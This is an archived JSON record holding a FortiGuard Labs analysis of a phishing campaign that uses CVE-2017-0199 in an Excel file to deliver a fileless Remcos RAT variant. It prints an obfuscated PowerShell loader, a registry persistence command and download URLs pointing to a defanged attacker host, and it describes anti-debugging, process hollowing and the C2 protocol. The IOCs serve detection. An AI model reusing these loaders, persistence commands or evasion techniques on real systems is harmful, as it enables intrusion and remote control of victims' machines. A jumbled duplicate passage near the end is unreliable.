{
	"id": "733b43d5-d8f1-4516-81b1-e31ba162552d",
	"created_at": "2026-04-06T00:17:53.047392Z",
	"updated_at": "2026-04-10T13:12:17.231343Z",
	"deleted_at": null,
	"sha1_hash": "1bc6a7fd93e4cc82b67e912b07942b1a79707f5c",
	"title": "New Campaign Uses Remcos RAT to Exploit Victims | FortiGuard Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2686430,
	"plain_text": "New Campaign Uses Remcos RAT to Exploit Victims | FortiGuard\r\nLabs\r\nBy Xiaopeng Zhang\r\nPublished: 2024-11-08 · Archived: 2026-04-02 11:15:01 UTC\r\nAffected platforms: Microsoft Windows\r\nImpacted parties: Windows Users\r\nImpact: Fully remotely control a victim’s computer\r\nSeverity level: High\r\nFortinet’s FortiGuard Labs recently noticed a phishing campaign in the wild. It is initialized with a phishing email\r\ncontaining a malicious Excel document. Upon researching the campaign, I found it was spreading a new variant of\r\nthe Remcos RAT.\r\nOverview\r\nRemcos is a commercial RAT (remote administration tool) sold online. It provides purchases with a wide range of\r\nadvanced features to remotely control computers belonging to the buyer. However, threat actors have abused\r\nRemcos to collect sensitive information from victims and remotely control their computers to perform further\r\nmalicious acts.\r\nFigure 1 displays the Remcos webpage.\r\nFigure 1: Remcos RAT software is sold online\r\nhttps://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims\r\nPage 1 of 24\n\nIn this security blog, I will show how Remcos is delivered to a victim’s device, what kinds of anti-analysis\r\ntechniques it leverages to protect itself from being analyzed, how this variant of Remcos is deployed, how it\r\nachieves persistence on the victim’s device, and what advanced features Remcos provides to remotely control a\r\nvictim’s device.\r\nThe Phishing Email\r\nFigure 2: The phishing email\r\nThe phishing email is shown in Figure 2. It contains an attached malicious Excel file disguised as an order file to\r\nconvince the recipient to open the document.\r\nCVE-2017-0199 Exploited by the Excel Document\r\nCVE-2017-0199 is a Remote Code Execution vulnerability that exploits how Microsoft Office and WordPad parse\r\nspecially crafted files. Once the recipient opens the attached file, the MS Excel program shows the file content, as\r\nseen in Figure 3.\r\nhttps://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims\r\nPage 2 of 24\n\nFigure 3: The file opened in Excel\r\nIn the background, the CVE-2017-0199 vulnerability is exploited to download an HTA file and execute it on the\r\nrecipient’s device.\r\nAs you may know, a crafted embedded OLE object leads to this vulnerability. Figure 4 demonstrates the content of\r\nthe crafted embedded OLE object (“\\x01Ole”).\r\nhttps://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims\r\nPage 3 of 24\n\nFigure 4: The crafted OLE object with a URL\r\nMS Excel program accesses the short URL “hxxps://og1[.]in/2Rxzb3.” It is then redirected to another URL,\r\n“hxxp://192[.]3[.]220[.]22/xampp/en/cookienetbookinetcahce.hta”. The download packet, shown in Figure 5, is a\r\nWireshark screenshot.\r\nhttps://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims\r\nPage 4 of 24\n\nFigure 5: The downloaded HTA file\r\nThe HTA file is an HTML Application file. It is executed by a Windows-native application (mshta.exe) called by\r\nMS Excel using DCOM components.\r\nMultiple Script Languages\r\nIts code is wrapped in multiple layers using different script languages and encoding methods, including\r\nJavaScript, VBScript, Base64-encoded, URL-encoded, and PowerShell, to protect itself from detection and\r\nanalysis.\r\nhttps://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims\r\nPage 5 of 24\n\nFigure 6: Examples of multiple script code\r\nFigure 6 shows some script code examples. These are executed when the downloaded HTA file is parsed in\r\nmshta.exe.\r\nTake a look at the Powershell code at the bottom of Figure 6. It calls the API URLDownloadToFile() to download\r\nan EXE file from the URL “hxxp://192[.]3[.]220[.]22/430/dllhost.exe” into a local file,\r\n“%AppData%\\dllhost.exe.”\r\nExecuting “STaRt $EnV: APPDATA\\dllhost.exe” starts the downloaded EXE file on the victim’s device. \r\nStarting the Downloaded EXE\r\nOnce the downloaded EXE file, dllhost.exe, starts, it extracts a batch of files into the %AppData% folder. Figure 7\r\nis a screenshot of the extracted files and sub-folders located in\r\n%AppData%\\intercessionate\\Favourablies117\\sulfonylurea. Some of the key data are hidden in these files.\r\nhttps://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims\r\nPage 6 of 24\n\nFigure 7: Screenshot of partially extracted files\r\ndllhost.exe then runs the PowerShell program by calling the API CreateProcessW() to execute a piece of\r\nPowerShell code, as illustrated in Figure 8.\r\nFigure 8: dllhost.exe about to run the PowerShell program\r\nSince dllhost.exe is a 32-bit process, it runs a 32-bit PowerShell,\r\n“C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.” This is important because the malicious\r\ncode only works on the 32-bit PowerShell process.\r\nThe PowerShell code breaks down as follows.\r\n$krjning=Get-Content -Raw '%AppData% \\intercessionate\\Favourablies117\\sulfonylurea\\Aerognosy.Res';\r\n$Lukewarmly95=$krjning.SubString(5322,3);\r\n.$Lukewarmly95($krjning)\r\nhttps://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims\r\nPage 7 of 24\n\nIt reads the content of “Aerognosy.Res,” an extracted file, into a local variable “$krjning,” which is full of\r\nPowerShell script. “iEx” is the return value of SubString(5322,3), which is short for an Invoke-Expression used to\r\nrun a string as a command or expression.  Finally, “iEx” executes the entire PowerShell script (“Aerognosy.Res”)\r\nafter calling “.$Lukewarmly95($krjning).”\r\nAgain, the PowerShell code is thoroughly obfuscated and encoded. Based on my research on the code, I\r\ndiscovered it performs the following functions:\r\nCopies dllhost.exe to %temp% and renames it “Vaccinerende.exe.”\r\nIt hides the current PowerShell process in the background.\r\nLoads malicious code from the extracted “Valvulate.Cru” file.\r\nDeploys the malicious code in memory by calling the APIs VirtualAlloc() and MemoryCopy().\r\nExecutes the malicious code’s entry point by calling the API CallWindowProcA(), as listed in Figure 9.\r\nFigure 9: Debugging the de-obfuscated PowerShell code from Aerognosy.Res\r\nMalicious Code Runs Inside the PowerShell Process\r\nSelf-decrypting the malicious code:\r\nAs I mentioned, the copied malicious code relies on a 32-bit version of PowerShell. It first runs a piece of self-decryption code mixed with a huge amount of useless instructions, creating a big challenge for analysts. Figure 10\r\npresents the end of the decrypting code, where it is about to execute the “call edi” instruction. The EDI register\r\nnow points to the decrypted code, as shown on the right.\r\nhttps://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims\r\nPage 8 of 24\n\nFigure 10: About to call the decrypted code\r\nIt leverages numerous complicated anti-analysis techniques to protect itself from being analyzed.\r\nAnti-Analysis Techniques:\r\n1.  It installs a vectored exception handler.\r\nWhenever an exception occurs, the exception handler is called to handle it. The exception code provides\r\ncorresponding ways to restore the code to resume from another offset. There are numerous exception instructions\r\ninside the malicious code. In other words, this strategy drives the entire code.\r\nFigure 11 shows an instruction that can raise an exception (0x8000003) at 0xEE16222, which the exception\r\nhandler will then capture and handle.\r\nhttps://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims\r\nPage 9 of 24\n\nFigure 11: Example of an exception\r\nThe exception handler function also checks the DR registers (Debug Registers), which are Dr0, Dr1, Dr2, Dr3,\r\nDr4, Dr5, Dr6, and Dr7. Their values are not 0 when a debugger is present.\r\n2.  System APIs are dynamically gained and called in a unique way.\r\nThere are no API name constant strings in the code. Instead, it keeps the hash codes of the API names. Whenever\r\nit calls an API, it uses a unique function that retrieves the API information from the PEB, which is pointed to by\r\nfs:[30h] to get their function address by matching the name’s hash code. This raises the difficulty of performing\r\nstatic analysis.\r\nIn addition, it has another function that is called every time an API is called. This function detects if the debugger\r\nhas set the API breakpoint.\r\nIt also encrypts the code from the caller’s return address to the base address, which cleans up the code just\r\nexecuted.\r\n3.  It is called ZwSetInformationThread(), and it performs anti-debugging.\r\nFigure 12: It breaks on the API ZwSetInformationThread()\r\nThe malicious code calls API ZwSetInformationThread() with the argument  ThreadHideFromDebugger (0x11)\r\nand the current thread (0xFFFFFFFE). This mechanism in Windows can conceal a thread’s existence from\r\ndebuggers. Figure 12 illustrates how it calls this API with the associated arguments.\r\nIf a debugger is attached to the current process, it exits immediately once the API is called.\r\n4.  It checks the result value of API ZwQueryInformationProcess().\r\nIt calls API ZwQueryInformationProcess() with the ProcessDebugPort (7) argument to detect if the debugPort is\r\nset (non-zero value). If yes, this means a debugger is attached to the current process (PowerShell.exe).\r\n5.  All the constant values are gained at run time.\r\nhttps://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims\r\nPage 10 of 24\n\nPlease refer to the code snippet below to see how it splits “mov ebx 100h” into three instructions.\r\n6.  It uses an API hooking technique for several APIs.\r\nThe malicious code simulates executing multiple API instructions (say, two instructions) at the beginning and then\r\njumps to the API to execute the rest of the instructions (beginning with the 3rd instruction).\r\nBelow is an example for CreateProcessInternalW(). The highlighted codes are simulated, which can invalidate any\r\nAPI breakpoints.\r\nWhenever any of the above detection conditions are triggered, the current process (PowerShell.exe) can become\r\nunresponsive, crash, or exit unexpectedly.\r\nProcess Hollowing (Malicious Code into Vaccinerende.exe):\r\nhttps://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims\r\nPage 11 of 24\n\nFigure 13: Display of CreateProcessInternal() and its parameters\r\nThe malicious code performs process hollowing to put itself into a newly created Vaccinerende.exe process\r\n(copied from dllhost.exe). To do this, it calls the API CreateProcessInternalW() with CreatFlags of\r\nCREATE_SUSPENDED (0x4), which will suspend the new process after it is created. It then calls some related\r\nAPIs to transfer all the malicious code to the new process and run it.\r\nThe relevant APIs are NtAllocateVirtualMemory(), ZwCreateSection(), NtMapViewOfSection(),\r\nNtGetContextThread(),  NtSetContextThread(), and NtResumeThread().\r\nMalicious Code Runs inside Vaccinerende.exe\r\nIt performs all the anti-analysis detections described in the above section and then uses a workflow different from\r\nthe PowerShell process.\r\nAccording to my research, it finishes some tasks, like maintaining persistence, downloading and decrypting the\r\nRemcos payload execution, and starting the downloaded Remcos in memory.\r\nMaintaining Persistence:\r\nThe malicious code adds a new auto-run item to the system registry to maintain persistence and maintain control\r\nof the victim’s device when it is restarted.\r\nFigure 14 shows the malicious code as it is about to run the REG (reg.exe) process to add the auto-run item and\r\nhow it appears in the Registry Editor. It calls the API ShellExecuteW() to run cmd.exe with a command line string\r\nof /c REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /f /v \"Chivey57\" /t\r\nhttps://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims\r\nPage 12 of 24\n\nREG_EXPAND_SZ /d \"%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path\r\n'HKCU:\\Software\\Roscoelite\\').Aftvttedes;%Misbehavers% ($Frligheden).\"\r\nFigure 14: Adding an auto-run item in the system registry\r\n“%Misbehavers%” has been defined as the full path to the 32-bit PowerShell.exe in the system environment. It\r\nreads a piece of PowerShell code, which is the same as the PowerShell code that dllhost.exe executes, from a\r\nstring value called “Aftvttedes” in the system registry.\r\nDownloading and running Remcos:\r\nNext, the malicious code downloads an encrypted file from the URL\r\n“hxxp[:]//192[.]3[.]220[.]22/hFXELFSwRHRwqbE214.bin.”  The file contains the encrypted Remcos malware.\r\nTo download the file, some relevant APIs, like InternetOpenA(), InternetOpenUrlA(), and InternetReadFile(), are\r\ncalled in a row.\r\nAfter decrypting the downloaded file, I found a new variant of Remcos. Rather than saving the Remcos file into a\r\nlocal file and running it, it directly deploys Remcos in the current process's memory (Vaccinerende.exe). In other\r\nwords, it is a fileless variant of Remcos.\r\nIt then starts Remcos on a thread, where the thread function (StartAddress) is the entry point. To start the thread, it\r\ncalls an undocumented API, NtCreateThreadEx(). Figure 15 shows a screenshot of the debugger as it is about to\r\ncall the API to start Remcos.\r\nhttps://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims\r\nPage 13 of 24\n\nFigure 15: Starting the Remcos payload in a thread\r\nInitializing Remcos\r\nEach Remcos variant has a setting block with a batch of configurations that control how Remcos operates on the\r\nvictim’s device. The setting block is encrypted and saved in the Resource section named “SETTINGS,” which\r\ngets decrypted at the start and initializes Remcos with the setting block.\r\nLook at Figure 16 to examine the decrypted setting block in memory.\r\nFigure 16: Memory view of the decrypted setting block\r\nhttps://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims\r\nPage 14 of 24\n\nThe setting block has 57 values in total, which are separated by “\\x7C\\x1E\\x1E\\x1F\\x7C”, as illustrated in Figure\r\n16. The values in the setting block are retrieved by their index, from 0 to 56, through a special function.\r\nThe setting values tell Remcos how to do its work on the victim’s device, including the C\u0026C server IP address and\r\nport, Remcos’ name, Remcos’ mutex name (also registry key name), a Remcos license number, the keylogger’s\r\nlocal log file, a couple of certificates used to verify and communicate with the C\u0026C server, and several switch\r\nflags indicating if a feature is enabled or disabled, such as Keylogger, Screenshot, Watchdog, Record audios,\r\nReset browsers’ login, and more.\r\nThe C\u0026C server IP\u0026Port string at index 0 is “107[.]173[.]4[.]16:2404:1,” where “107[.]173[.]4[.]16” is the IP\r\naddress, “2404” is the TCP port, and the last “1” means that it enables TLS to communicate with the C\u0026C server.\r\nRemcos collects some basic information from the victim’s device. It then encrypts and sends the collected data to\r\nits C\u0026C server to register that the victim’s device is online and ready to be controlled. This is the first command\r\npacket sent to the C\u0026C server.\r\nhttps://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims\r\nPage 15 of 24\n\nFigure 17: Example of the register packet with some basic information\r\nThe memory dump data in Figure 17 shows the content of the register packet (command ID 4Bh) that is about to\r\nbe encrypted.\r\nWhen TLS is enabled (as set in the settings block), packets follow the same structure, whether sending or\r\nreceiving. These packets consist of Packet Magic (like 0xFF0424) + Command Data Size (like 0x2C6) +\r\nCommand ID (like 0x4B) + Command Data + Packet Type (like 0x17, 0x16, and 0x15).\r\nI will break down the command data of the 4B to explain what basic information Remcos collects from the\r\nvictim’s device. The command data has many separators (“\\x7C\\x1E\\x1E\\x1F\\x7C”) to separate the collected\r\nbasic information.\r\nThe processor’s information.\r\nhttps://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims\r\nPage 16 of 24\n\nThe memory status.\r\nThe user’s privilege level.\r\nThe location of the victim’s device.\r\nRemcos’ file type (“EXE”), its full path on the victim’s device, and the installed time.\r\nRemcos is assigned the name “Rmc-DSGECX,” which is defined in the setting block.\r\nThe IP address of the C\u0026C server.\r\nThe victim’s device run time since its last start by calling the API GetTickCount().\r\nThe idle time of the victim’s device.\r\nThe Remcos Keylogger local file path.\r\nThe active program’s title information on the device.\r\nThe device name and user name of the affected device.\r\nThe version of this variant of Remcos, which is the hardcoded string “5.1.2 Pro”.\r\nThe OS information, “Windows 10 Enterprise (64 bit).”\r\nFeatures and Control Commands\r\nAfter registering the victim’s device on the C\u0026C server, it receives a control command packet from the server to\r\nperform further work on the victim’s device. These features and corresponding commands are detailed below.\r\nThis example of control command 06h asks Remcos to obtain all running process lists from the victim’s device.\r\nRemcos sends a 4Fh command packet with the collected process list consisting of the process name, PID,\r\narchitecture (64bit or 32bit), and the full path, as shown in Figure 18.\r\nhttps://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims\r\nPage 17 of 24\n\nFigure 18: Send process list to C2 server\r\nFigure 19 is a screenshot of the C\u0026C server view of the process list.\r\nhttps://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims\r\nPage 18 of 24\n\nFigure 19: Process Manager on the C\u0026C server\r\nRemcos includes a function that parses the received control command data from the server and then performs the\r\ncorresponding action on the victim’s device.\r\nMy analysis of this function shows that Remcos has the features and commands listed in the following chart.\r\nhttps://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims\r\nPage 19 of 24\n\nhttps://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims\r\nPage 20 of 24\n\nSummary\r\nIn this analysis, I walked through the entire process of the phishing campaign. It begins with a phishing email with\r\nan attached OLE Excel document. This disguised email is used to trick the recipient into opening the attached\r\nExcel document.\r\nThe CVE-2017-0199 vulnerability is exploited once the Excel file is opened on the victim’s device. It then\r\ndownloads an HTA file and executes it on the device. Multiple script languages are leveraged to download an\r\nEXE file (dllhost.exe), which then starts the 32-bit PowerShell process to load the malicious code from extracted\r\nfiles and execute it in the PowerShell process.\r\nNext, I explained what anti-analysis techniques are used in the code, such as a vectored exception handler,\r\ndynamically gained APIs, dynamically calculated constant numbers, the APIs ZwSetInformationThread() and\r\nZwQueryInformationProcess(), and API hooking.\r\nAfter passing the detections introduced in the anti-analysis part, it performs process hollowing to run the\r\nmalicious code in the new process “Vaccinerende.exe,” which not only ensures persistence on the victim’s device\r\nbut also downloads and decrypts the Remcos payload file.\r\nI then elaborated on how it keeps Remcos in memory and starts its entry point function in a thread (API\r\nNtCreateThreadEx()).\r\nSubsequently, I explained how Remcos works with its setting block on the victim’s device, how Remcos\r\ncommunicates with its C\u0026C server, and what the format of the traffic packet looks like.\r\nFinally, I focused on introducing the features this Remcos variant can perform on the victim’s device and listing\r\nthe relevant control commands for each feature.\r\nFigure 20 shows the entire process of the phishing campaign.\r\nhttps://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims\r\nPage 21 of 24\n\nFigure 20: Workflow of the entire phishing campaign\r\nFortinet Protections\r\nFortinet customers are already protected from this campaign with FortiGuard’s AntiSPAM, Web Filtering, IPS,\r\nand AntiVirus services as follows:\r\nThe relevant URLs are rated as “Malicious Websites” by the FortiGuard Web Filtering service.\r\nFortiMail recognizes the phishing email as “virus detected.” In addition, real-time anti-phishing provided by\r\nFortiSandbox embedded in Fortinet’s FortiMail, web filtering, and antivirus solutions offers advanced protection\r\nagainst both known and unknown phishing attempts.\r\nFortiGuard IPS service detects the vulnerability exploit against CVE-2017-0199 with the signature\r\n“MS.Office.OLE.autolink.Code.Execution”.\r\nFortiGuard Antivirus service detects the original Excel document, the HTA file, the downloaded executable file,\r\nthe data/script files and the Recom executable file with the following AV signatures.\r\nMSExcel/CVE-2017-0199.REM!exploit\r\nJS/Remcos.CB!tr.dldr\r\nPowerShell/Remcos.SER!tr\r\nData/Remcos.LAV!tr\r\nW32/Remcos.LD!tr\r\nFortiGate, FortiMail, FortiClient, and FortiEDR support the FortiGuard AntiVirus service. The FortiGuard\r\nAntiVirus engine is part of each solution. As a result, customers who have these products with up-to-date\r\nhttps://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims\r\nPage 22 of 24\n\nprotections are already protected.\r\nThe FortiGuard CDR (content disarm and reconstruction) service can disarm the embedded link object inside the\r\nExcel document.\r\nTo stay informed of new and emerging threats, you can sign up to receive future alerts.\r\nWe also suggest our readers go through the free NSE training: NSE 1 – Information Security Awareness, a module\r\non Internet threats designed to help end users learn how to identify and protect themselves from phishing attacks.\r\nIf you believe this or any other cybersecurity threat has impacted your organization, please contact our Global\r\nFortiGuard Incident Response Team.\r\nIOCs\r\nURLs:\r\nhxxps://og1[.]in/2Rxzb3\r\nhxxp://192[.]3[.]220[.]22/xampp/en/cookienetbookinetcahce.hta\r\nhxxp://192[.]3[.]220[.]22/hFXELFSwRHRwqbE214.bin\r\nhxxp://192[.]3[.]220[.]22/430/dllhost.exe\r\nC2 server:\r\n107[.]173[.]4[.]16:2404\r\nRelevant Sample SHA-256:\r\n[PO-9987689987.xls]\r\n4A670E3D4B8481CED88C74458FEC448A0FE40064AB2B1B00A289AB504015E944\r\n[cookienetbookinetcahce.hta]\r\nF99757C98007DA241258AE12EC0FD5083F0475A993CA6309811263AAD17D4661\r\n[dllhost.exe / Vaccinerende.exe]\r\n9124D7696D2B94E7959933C3F7A8F68E61A5CE29CD5934A4D0379C2193B126BE\r\n[Aerognosy.Res]\r\nD4D98FDBE306D61986BED62340744554E0A288C5A804ED5C924F66885CBF3514\r\n[Valvulate.Cru]\r\nF9B744D0223EFE3C01C94D526881A95523C2F5E457F03774DD1D661944E60852\r\n[Remcos / Decrypted hFXELFSwRHRwqbE214.bin]\r\n24A4EBF1DE71F332F38DE69BAF2DA3019A87D45129411AD4F7D3EA48F506119D\r\nhttps://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims\r\nPage 23 of 24\n\nSource: https://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims\r\nhttps://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims\r\nPage 24 of 24\n\nThis example of control Remcos sends a 4Fh command command packet 06h asks Remcos with the collected to obtain process all running process list consisting lists from of the process the victim’s name, PID, device.\narchitecture (64bit or 32bit), and the full path, as shown in Figure 18.\n   Page 17 of 24 \n\n https://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims   \nFigure 18: Send process list to C2 server  \nFigure 19 is a screenshot of the C\u0026C server view of the process list.\n   Page 18 of 24",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims"
	],
	"report_names": [
		"new-campaign-uses-remcos-rat-to-exploit-victims"
	],
	"threat_actors": [
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434673,
	"ts_updated_at": 1775826737,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1bc6a7fd93e4cc82b67e912b07942b1a79707f5c.pdf",
		"text": "https://archive.orkl.eu/1bc6a7fd93e4cc82b67e912b07942b1a79707f5c.txt",
		"img": "https://archive.orkl.eu/1bc6a7fd93e4cc82b67e912b07942b1a79707f5c.jpg"
	}
}